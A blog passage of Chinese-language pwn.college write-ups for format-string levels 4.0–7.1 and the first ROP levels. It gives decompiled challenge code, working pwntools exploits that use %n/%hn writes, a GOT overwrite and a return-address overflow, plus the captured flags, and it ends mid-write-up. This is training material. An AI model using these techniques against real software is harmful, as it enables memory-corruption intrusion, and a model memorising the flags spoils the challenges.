简单，通过逆向我们知道，check_win() 输出 flag 的条件是 .bss 段上的 qword_404160 变量值为 0xC2，为了满足这一条件，我们直接用 %n 篡改即可。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level4.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+293
b *check_win+77
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position, var_offset):
    return flat(
        f"aaaa%190x%{position}$n\x00".encode("ascii"),
        elf.bss() + var_offset,
    )


def attack(target):
    try:
        payload = construct_payload(29, 0xC0)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{MrJaEVG2FM1QGKYUbL8GjOyBkhg.dJjM0MDL5cTNxgzW}

Level 4.1

Information

Category: Pwn

Description

Use a format string exploit to set a global variable.

Write-up

参见 Level 4.0。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level4.1"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+191
b *check_win+77
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position, var_offset):
    return flat(
        f"aaaaa%116x%{position}$n\x00".encode("ascii"),
        elf.bss() + var_offset,
    )


def attack(target):
    try:
        payload = construct_payload(30, 0x40)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{gYbZ_KMoDIuA2cpDPTK3F8hxiEo.dNjM0MDL5cTNxgzW}

Level 5.0

Information

Category: Pwn

Description

Use a format string exploit to set a larger global variable.

Write-up

int check_win()
{
  int v0; // eax

  puts("Checking win value...");
  printf("... desired win value: %#lx\n", 0x82802F819C27A46ALL);
  printf("... written win value: %#lx\n", qword_4040F8);
  if ( qword_4040F8 != 0x82802F819C27A46ALL )
    return puts("... INCORRECT!");
  puts("... SUCCESS! Here is your flag:");
  v0 = open("/flag", 0);
  return sendfile(1, v0, 0LL, 0x80uLL);
}

WHAT CAN I SAY...WHAT U WANT ME TO SAY...

对于这种巨大的数值的策略是我们可以分组写，按 2 字节一组应该是不错的选项。第一组写起来应该是没有任何坑的，注意栈对齐加减字节即可；第二组开始则应该减去前一组写入的字节数再 % 0x10000，这是为了回环到 [0x00, 0xFF] 这个区间，这样就确保了 %n 写入的是我们期望的值。

评价一下我的码风好不好看 1/31/2025。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level5.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+315
b *check_win+82
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position, var_offset):
    parts = [0xA46A, 0x9C27, 0x2F81, 0x8280]

    align_stack = b"a" * 0x3
    align_offset = len(align_stack)

    fmtstr = (
        b"".join(
            f"%{(parts[i] - (align_offset if i == 0 else parts[i - 1])) % 0x10000}x%{position + i}$hn".encode(
                "ascii"
            )
            for i in range(len(parts))
        )
        + b"\x00"
    )
    addresses = [elf.bss() + var_offset + (0x2 * i) for i in range(4)]

    return flat(
        align_stack,
        fmtstr,
        *addresses,
    )


def attack(target):
    try:
        payload = construct_payload(45, 0x58)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{wRZzRCQlIP6gytdVI6FYHhTLMom.dRjM0MDL5cTNxgzW}

Level 5.1

Information

Category: Pwn

Description

Use a format string exploit to set a larger global variable.

Write-up

参见 Level 5.0。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level5.1"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+213
b *check_win+82
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position, var_offset):
    parts = [0x15C7, 0x32CC, 0x2869, 0x2872]

    align_stack = b"a" * 0x6
    align_offset = len(align_stack)

    fmtstr = (
        b"".join(
            f"%{(parts[i] - (align_offset if i == 0 else parts[i - 1])) % 0x10000}x%{position + i}$hn".encode(
                "ascii"
            )
            for i in range(len(parts))
        )
        + b"\x00"
    )
    addresses = [elf.bss() + var_offset + (0x2 * i) for i in range(4)]

    return flat(
        align_stack,
        fmtstr,
        *addresses,
    )


def attack(target):
    try:
        payload = construct_payload(39, 0xA8)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{sjfLqAt2jCG0OYV91dJi9052Hf4.dVjM0MDL5cTNxgzW}

Level 6.0

Information

Category: Pwn

Description

Use a format string exploit to copy a value and overwrite a global variable.

Write-up

unsigned __int64 func()
{
  int v0; // eax
  unsigned int v1; // eax
  _QWORD v3[63]; // [rsp+0h] [rbp-200h] BYREF
  unsigned __int64 v4; // [rsp+1F8h] [rbp-8h]
  __int64 savedregs; // [rsp+200h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+208h] [rbp+8h] BYREF

  v4 = __readfsqword(0x28u);
  sp_ = (__int64)v3;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v3) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  memset(v3, 0, sizeof(v3));
  v0 = open("/dev/urandom", 0, v3);
  read(v0, &v3[62], 3uLL);
  v1 = time(0LL);
  srand(v1);
  puts("This challenge requires you to set a win value, located in the .bss, to a secret value! This secret value");
  puts("is currently stored in a stack variable, and you will have to figure out how to copy it into the .bss.");
  puts("There are two options: do a leak (using one printf) followed by a write (using a second printf), or use");
  printf("a _dynamic padding size_, using the * format character, in combination with %%n, in a _single_ printf,\n");
  puts("to copy memory. Since this level only gives you a single printf() call, you will likely need to use the");
  puts("latter. Check the printf man page (in category 3: `man 3 printf`) for documentation on *.\n");
  puts("As before, if you successfully pull that off, the challenge will give you the flag!");
  putchar(10);
  printf(
    "The win value in the .bss is located at %p! Remember to write this in little endian in your format string.\n",
    &qword_404158);
  printf("Remember, you can swap %%n with %%lx to see what address you will be writing into to make sure you have the.");
  puts("correct offset.\n");
  printf("The secret value is located on the stack, %#x bytes after the start of your format string!\n\n", 325);
  printf("I will now read up to %d bytes. Send your data!\n", 256);
  HIDWORD(v3[12]) = read(0, (char *)&v3[21] + 3, 0x100uLL);
  *((_BYTE *)&v3[21] + SHIDWORD(v3[12]) + 3) = 0;
  printf("Received %d bytes!\n", HIDWORD(v3[12]));
  putchar(10);
  printf("I will now call printf on your data!\n");
  putchar(10);
  printf((const char *)&v3[21] + 3, 256LL);
  putchar(10);
  puts("And now, let's check the win value!");
  check_win(v3[62]);
  return __readfsqword(0x28u) ^ v4;
}

int __fastcall check_win(__int64 a1)
{
  int v1; // eax

  puts("Checking win value...");
  printf("... desired win value: %#lx\n", a1);
  printf("... written win value: %#lx\n", qword_404158);
  if ( a1 != qword_404158 )
    return puts("... INCORRECT!");
  puts("... SUCCESS! Here is your flag:");
  v1 = open("/flag", 0);
  return sendfile(1, v1, 0LL, 0x80uLL);
}

这题就是读了一个三字节的随机值到栈上，给 flag 的条件是我们 .bss 段中的 qword_404158 变量值必须等于这个随机值。思路是用格式化字符串中的 * (specifies a dynamic padding size) 来 'copy memory'. 举个栗子：%*10$c 会把第十个参数的值用作 padding size，输出大小为 padding size 的内容。所以我们只要把这个 padding size 通过 %n 写入就相当于实现了 'copy memory' 了。

这个方法这对于比较小的值还好，太大了就不太友善了，cuz bunch of spaces.

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level6.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+173
b *func+417
b *check_win+79
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(random_value_position, position, var_offset):
    return flat(
        f"%*{random_value_position}$c%{position}$naaaaaaaaa\x00",
        elf.bss() + var_offset,
    )


def attack(target):
    try:
        payload = construct_payload(68, 30, 0xB8)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{ExgmxPb8JckvvOZvTLw9kufKyFP.dZjM0MDL5cTNxgzW}

Level 6.1

Information

Category: Pwn

Description

Use a format string exploit to copy a value and overwrite a global variable.

Write-up

参见 Level 6.0。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level6.1"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+100
b *func+305
b *check_win+79
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(random_value_position, position, var_offset):
    return flat(
        f"%*{random_value_position}$c%{position}$naaaaaaaaaaa\x00",
        elf.bss() + var_offset,
    )


def attack(target):
    try:
        payload = construct_payload(66, 31, 0xB8)

        target.sendafter(b"Send your data!", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{o3IDJsXjzJ3CBMBZz_66rdU2oQR.ddjM0MDL5cTNxgzW}

Level 7.0

Information

Category: Pwn

Description

Use a format string exploit to overwrite a got entry.

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  size_t v3; // rax
  size_t v4; // rax
  int fd; // [rsp+2Ch] [rbp-14h]
  const char **i; // [rsp+30h] [rbp-10h]
  const char **j; // [rsp+38h] [rbp-8h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  if ( argc <= 0 )
    __assert_fail("argc > 0", "<stdin>", 0xA0u, "main");
  puts(
    "In this challenge, you will be performing attack against the old and famous vulnerability:\n"
    "\"format string vulnerability\". This challenge reads in some bytes and print the\n"
    "input as the format using `printf` in different ways(depending on the specific challenge\n"
    "configuration). Different challenges have different protections on. ROP may be needed in\n"
    "some challenges. Have fun!");
  puts("To ensure that you are ROPing, rather than doing other tricks, this");
  puts("will sanitize all environment variables and arguments and close all file");
  puts("descriptors > 2,");
  putchar(10);
  for ( fd = 3; fd <= 9999; ++fd )
    close(fd);
  for ( i = argv; *i; ++i )
  {
    v3 = strlen(*i);
    memset((void *)*i, 0, v3);
  }
  for ( j = envp; *j; ++j )
  {
    v4 = strlen(*j);
    memset((void *)*j, 0, v4);
  }
  func();
  puts("### Goodbye!");
  return 0;
}

unsigned __int64 func()
{
  char v1[1032]; // [rsp+60h] [rbp-410h] BYREF
  unsigned __int64 v2; // [rsp+468h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("In this challenge, you can perform format string attack for infinite times");
  puts("You can use the the attack to leak information and prepare your payload");
  puts("After your payload is ready, send \"END\" to exit from the while loop");
  puts("And hopefully your payload can be triggered :)\n");
  memset(v1, 0, 0x400uLL);
  puts("You can use `checksec` command to check the protection of the binary.");
  while ( 1 )
  {
    puts("\nNow, the program is waiting for your input.");
    puts("If your input contains \"END\", the program exits from the while loop before triggering the vulnerability:");
    memset(v1, 0, 0x400uLL);
    memset(v1, 0, 0x400uLL);
    if ( (int)read(0, v1, 0x3FFuLL) <= 0 || strstr(v1, "END") )
      break;
    puts("Show me what you got :P");
    printf(v1);
  }
  return __readfsqword(0x28u) ^ v2;
}

并没有什么特别的地方，只要 read 返回 > 0，并且输入中不包含 END 程序就可以无限次触发格式化字符串漏洞。而我们的目标是执行下面这个 win 函数。

void __noreturn win()
{
  int v0; // eax

  puts("You win! Here is your flag:");
  v0 = open("/flag", 0);
  sendfile(1, v0, 0LL, 0x400uLL);
  exit(0);
}

检查保护措施，发现没开 PIE，看到这个就开心，因为之后利用起来会比较轻松……有 Canary，但因为格式化字符串漏洞的存在，我们可以直接忽略掉它。重点在于这个程序是 Partial RELRO 的，这个 RELRO 级别的 GOT 表是可写的，注意到我们触发格式化字符串漏洞之后程序返回到 main 还会调用一次 puts 函数（对于 7.1 是这样的，但对于 7.0 这个情况，事实上我们会在循环体内再次出发 puts，所以 7.0 可以不输入 END），那我们只要通过格式化字符串漏洞把 puts 的 GOT 表内容篡改为 win 的地址就好了，篡改后再次调用 puts 就会执行 win。

需要注意的点是由于 win 内部还有一个 puts，所以我们要跳过它。

pwndbg> checksec
File:     /home/cub3y0nd/Projects/pwn.college/babyfmt_level7.0
Arch:     amd64
RELRO:      Partial RELRO
Stack:      Canary found
NX:         NX enabled
PIE:        No PIE (0x400000)
SHSTK:      Enabled
IBT:        Enabled
Stripped:   No
pwndbg> got
Filtering out read-only entries (display them with -r or --show-readonly)

State of the GOT of /home/cub3y0nd/Projects/pwn.college/babyfmt_level7.0:
GOT protection: Partial RELRO | Found 15 GOT entries passing the filter
[0x404018] putchar@GLIBC_2.2.5 -> 0x7502eb8c8310 (putchar) ◂— endbr64
[0x404020] puts@GLIBC_2.2.5 -> 0x7502eb8c6360 (puts) ◂— endbr64
[0x404028] strlen@GLIBC_2.2.5 -> 0x7502eb9b3040 ◂— endbr64
[0x404030] __stack_chk_fail@GLIBC_2.4 -> 0x401060 ◂— endbr64
[0x404038] setbuf@GLIBC_2.2.5 -> 0x7502eb8cdb30 (setbuf) ◂— endbr64
[0x404040] printf@GLIBC_2.2.5 -> 0x7502eb89de00 (printf) ◂— endbr64
[0x404048] __assert_fail@GLIBC_2.2.5 -> 0x401090 ◂— endbr64
[0x404050] memset@GLIBC_2.2.5 -> 0x7502eb9b0cc0 ◂— endbr64
[0x404058] close@GLIBC_2.2.5 -> 0x7502eb94be60 (close) ◂— endbr64
[0x404060] read@GLIBC_2.2.5 -> 0x7502eb950a20 (read) ◂— endbr64
[0x404068] sendfile@GLIBC_2.2.5 -> 0x4010d0 ◂— endbr64
[0x404070] setvbuf@GLIBC_2.2.5 -> 0x7502eb8c6b10 (setvbuf) ◂— endbr64
[0x404078] open@GLIBC_2.2.5 -> 0x4010f0 ◂— endbr64
[0x404080] exit@GLIBC_2.2.5 -> 0x401100 ◂— endbr64
[0x404088] strstr@GLIBC_2.2.5 -> 0x401110 ◂— endbr64
pwndbg> i fun win
All functions matching regular expression "win":

Non-debugging symbols:
0x0000000000401540  win
0x00007502eb8cda20  rewind
0x00007502eb8e2330  __pthread_unwind_next
0x00007502eb927940  rewinddir
0x00007502eb95d260  __libc_unwind_link_get

所以这时候没 PIE 的爽就体现出来了，不需要想办法泄漏 GOT 表，已经被看光光了，指哪打哪 LOL

19:27，为什么我想睡觉？一定是被自己出的烂题折腾惨了……打完这题刷电影去～<br /> 20:49，啊啊啊啊啊写 0 真麻烦，不干了！

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level7.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+280
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position):
    puts_got = 0x404020
    parts = [0x1554, 0x0040, 0x0000, 0x0000]

    align_stack = b"a" * 3
    written_chars = len(align_stack) % 0x10000

    fmtstr_parts = []

    for idx, target_byte in enumerate(parts):
        padding = (target_byte - written_chars) % 0x10000

        fmtstr_parts.append(
            f"%{padding}x%{position + idx}$hn"
            if padding > 0
            else f"%{position + idx}$hn"
        )

        written_chars += padding

    fmtstr = "".join(fmtstr_parts).encode("ascii") + b"\x00"
    addresses = [puts_got + (i * 0x2) for i in range(len(parts))]

    return flat(
        align_stack,
        fmtstr,
        *addresses,
    )


def attack(target):
    try:
        payload = construct_payload(24)

        target.sendafter(b"vulnerability:", payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Ux3-i0zQW7ZkTY5X_RLl2eIH1Fb.dhjM0MDL5cTNxgzW}

Level 7.1

Information

Category: Pwn

Description

Use a format string exploit to overwrite a got entry.

Write-up

参见 Level 7.0。

Exploit

#!/usr/bin/python3

from contextlib import contextmanager

from pwn import ELF, context, flat, gdb, log, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyfmt_level7.1"
HOST, PORT = "localhost", 1337

gdbscript = """
b *func+198
c
"""


@contextmanager
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    target = None

    try:
        if local:
            global elf

            elf = ELF(FILE)
            context.binary = elf

            target = (
                gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
                if debug
                else process([elf.path] + (argv or []), env=envp)
            )
        else:
            target = remote(HOST, PORT)
        yield target
    finally:
        if target:
            target.close()


def construct_payload(position):
    puts_got = 0x404020
    parts = [0x1351, 0x0040, 0x0000, 0x0000]

    align_stack = b"a" * 3
    written_chars = len(align_stack) % 0x10000

    fmtstr_parts = []

    for idx, target_byte in enumerate(parts):
        padding = (target_byte - written_chars) % 0x10000

        fmtstr_parts.append(
            f"%{padding}x%{position + idx}$hn"
            if padding > 0
            else f"%{position + idx}$hn"
        )

        written_chars += padding

    fmtstr = "".join(fmtstr_parts).encode("ascii") + b"\x00"
    addresses = [puts_got + (i * 0x2) for i in range(len(parts))]

    return flat(
        align_stack,
        fmtstr,
        *addresses,
    )


def attack(target):
    try:
        payload = construct_payload(72)

        target.sendafter(b"Have fun!", payload)
        target.sendline(b"END")

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        with launch(debug=False) as target:
            if attack(target):
                log.success("Attack completed successfully.")
            else:
                log.failure("Attack did not yield a flag.")
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{s0yYpAm36BLU2Mp5PhbvBmPuc-3.dljM0MDL5cTNxgzW}

Write-ups: Program Security (Return Oriented Programming) series (Completed)

Sun, 19 Jan 2025 00:00:00 GMT

前言

我觉得应该珍惜现在的 ROP，Intel 近几年刚提出的 CET (Control-flow Enforcement Technology) 足以杀死绝大多数 ROP Exploit 了……以后 ROP 应该会更难一点，虽然不排除可能会出现新奇的绕过方式就是了 LOL

唉，算是经历了一个时代的变迁了吧？<s>简单了解了一下 CET，靠，我要是早几年生我也可以想出来！！！</s>就很感慨厉害的技术往往都是一些很简单的概念，却达到了非凡的效果，我也幻想自己可以研究点东西出来。

Level 1.0

Information

Category: Pwn

Description

Overwrite a return address to trigger a win function!

Write-up

怀着感慨和某种说不清的复杂的心情步入本章的第一题……

int __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  _QWORD v4[3]; // [rsp+0h] [rbp-60h] BYREF
  int v5; // [rsp+1Ch] [rbp-44h]
  _BYTE buf[60]; // [rsp+20h] [rbp-40h] BYREF
  int v7; // [rsp+5Ch] [rbp-4h]
  __int64 savedregs; // [rsp+60h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+68h] [rbp+8h] BYREF

  v5 = a1;
  v4[2] = a2;
  v4[1] = a3;
  puts(
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
  sp_ = (__int64)v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts("In this challenge, there is a win() function.");
  printf("win() will open the flag and send its data to stdout; it is at %p.\n", win);
  puts("In order to get the flag, you will need to call this function.\n");
  puts("You can call a function by directly overflowing into the saved return address,");
  printf(
    "which is stored at %p, %d bytes after the start of your input buffer.\n",
    (const void *)rp_,
    rp_ - (_QWORD)buf);
  printf(
    "That means that you will need to input at least %d bytes (%d to fill the buffer,\n",
    rp_ - (_QWORD)buf + 8,
    57);
  printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_QWORD)buf - 57);
  puts("and 8 that will overwrite the return address).");
  v7 = read(0, buf, 0x1000uLL);
  printf("Received %d bytes! This is potentially %d gadgets.\n", v7, (unsigned __int64)&buf[v7 - rp_] >> 3);
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
  puts("from within this challenge. You will have to do that by yourself.");
  print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v7 - rp_] >> 3) + 1);
  return puts("Leaving!");
}

很明显的栈溢出吧，然后我们希望执行 win：

__uid_t win()
{
  int *v0; // rax
  char *v1; // rax
  __uid_t result; // eax
  int *v3; // rax
  char *v4; // rax

  puts("You win! Here is your flag:");
  flag_fd_23114 = open("/flag", 0);
  if ( flag_fd_23114 >= 0 )
  {
    flag_length_23115 = read(flag_fd_23114, &flag_23113, 0x100uLL);
    if ( flag_length_23115 > 0 )
    {
      write(1, &flag_23113, flag_length_23115);
      return puts("\n");
    }
    else
    {
      v3 = __errno_location();
      v4 = strerror(*v3);
      return printf("\n  ERROR: Failed to read the flag -- %s!\n", v4);
    }
  }
  else
  {
    v0 = __errno_location();
    v1 = strerror(*v0);
    printf("\n  ERROR: Failed to open the flag -- %s!\n", v1);
    result = geteuid();
    if ( result )
    {
      puts("  Your effective user id is not 0!");
      return puts("  You must directly run the suid binary in order to have the correct permissions!");
    }
  }
  return result;
}

好吧，看来第一题比我想象中的要简单得多的多，可以说是没有任何限制条件，直接覆盖返回地址解决。~就当是安慰我了 LMAO~

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level1.0"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

padding_to_ret = b"".ljust(0x48, b"A")
win_address = p64(0x401926)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    payload = padding_to_ret
    payload += win_address

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)
        target.recvall(timeout=3)
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{wpfRp_d39M4TTN2Q66mN_kfp0_g.0VM0MDL5cTNxgzW}

Level 1.1

Information

Category: Pwn

Description

Overwrite a return address to trigger a win function!

Write-up

参见 Level 1.0。

Exploit

#!/usr/bin/python3

from pwn import ELF, context, gdb, log, p64, process, remote

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level1.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

padding_to_ret = b"".ljust(0x68, b"A")
win_address = p64(0x401CAF)


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def construct_payload():
    payload = padding_to_ret
    payload += win_address

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)
        target.recvall(timeout=3)
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        target = launch(debug=False)
        payload = construct_payload()

        attack(target, payload)
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{kIrK17VA4RSajTUwItMyNbaBDJw.0lM0MDL5cTNxgzW}

Level 2.0

Information

Category: Pwn

Description

Use ROP to trigger a two-stage win function!

Write-up

int __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  _QWORD v4[3]; // [rsp+0h] [rbp-80h] BYREF
  int v5; // [rsp+1Ch] [rbp-64h]
  _BYTE buf[92]; // [rsp+20h] [rbp-60h] BYREF
  int v7; // [rsp+7Ch] [rbp-4h]
  __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF

  v5 = a1;
  v4[2] = a2;
  v4[1] = a3;
  puts(
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
  sp_ = (__int64)v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts(
